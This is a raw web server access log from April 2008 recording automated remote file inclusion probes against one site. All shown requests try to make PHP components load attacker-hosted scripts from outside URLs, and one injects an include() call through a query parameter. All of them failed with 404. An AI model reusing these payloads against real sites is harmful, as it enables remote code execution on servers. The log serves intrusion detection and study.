82.194.86.113 - - [28/Apr/2008:06:30:26 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
93.93.112.23 - - [28/Apr/2008:06:30:31 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [28/Apr/2008:06:30:32 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [28/Apr/2008:06:30:37 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:30:46 -0700] "GET /logs/access_071022.log/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:30:46 -0700] "GET /logs/access_071022.log/index.php?body=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:31:59 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:31:59 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:31:59 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:32:27 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:32:27 -0700] "GET //ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:32:28 -0700] "GET /logs//ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:33:19 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:24 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:24 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:24 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:33:24 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:34 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:34 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.179.10.151 - - [28/Apr/2008:06:33:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:33:59 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:33:59 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:33:59 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:21 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:21 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:21 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.1.202.61 - - [28/Apr/2008:06:34:29 -0700] "GET /main.php3?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:47 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:47 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:34:47 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:35:10 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:35:10 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:35:10 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:35:18 -0700] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:35:27 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:35:27 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:35:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:36:38 -0700] "GET /logs/access_080225.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:36:39 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:36:39 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
209.216.2.12 - - [28/Apr/2008:06:36:51 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.216.2.12 - - [28/Apr/2008:06:36:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.216.2.12 - - [28/Apr/2008:06:36:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:38:30 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:38:34 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:38:41 -0700] "GET /logs/access_080128.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:38:41 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:38:41 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:38:52 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:38:58 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:39:02 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:39:04 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:39:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:39:08 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:39:08 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:39:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:39:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.24.50.200 - - [28/Apr/2008:06:40:08 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
217.24.50.200 - - [28/Apr/2008:06:40:08 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
217.24.50.200 - - [28/Apr/2008:06:40:08 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:40:45 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:40:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:40:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.106.184.203 - - [28/Apr/2008:06:40:51 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
87.106.184.203 - - [28/Apr/2008:06:40:51 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
217.24.50.200 - - [28/Apr/2008:06:41:06 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
200.159.108.202 - - [28/Apr/2008:06:42:24 -0700] "GET /logs/access_080211.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurotandem2008.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.159.108.202 - - [28/Apr/2008:06:42:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurotandem2008.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.159.108.202 - - [28/Apr/2008:06:42:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurotandem2008.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:33 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:33 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:33 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:33 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:33 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:34 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.237.76.146 - - [28/Apr/2008:06:42:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.17.20.250 - - [28/Apr/2008:06:43:32 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.17.20.250 - - [28/Apr/2008:06:43:32 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:44:00 -0700] "GET /logs/access_080128.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:44:01 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:44:01 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
221.143.49.246 - - [28/Apr/2008:06:44:39 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:44:49 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:44:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:44:50 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.17.20.250 - - [28/Apr/2008:06:45:08 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.18.104.114 - - [28/Apr/2008:06:45:08 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.18.104.114 - - [28/Apr/2008:06:45:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.18.104.114 - - [28/Apr/2008:06:45:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.117.106.4 - - [28/Apr/2008:06:45:49 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.117.106.4 - - [28/Apr/2008:06:45:50 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.117.106.4 - - [28/Apr/2008:06:45:50 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:46:13 -0700] "GET /logs/access_080225.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.117.106.4 - - [28/Apr/2008:06:46:27 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://it.geocities.com/bigli0np0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:48:12 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:48:12 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:48:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:49:09 -0700] "GET /logs/access_080225.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:49:56 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:49:56 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:49:57 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:50:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:50:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:52:30 -0700] "GET //modules/Forums/favorites.php?nuke_bb_root_path=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:52:34 -0700] "GET /logs//modules/Forums/favorites.php?nuke_bb_root_path=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:52:38 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:52:39 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:52:39 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.51.25.186 - - [28/Apr/2008:06:52:44 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.51.25.186 - - [28/Apr/2008:06:52:44 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.51.25.186 - - [28/Apr/2008:06:52:44 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
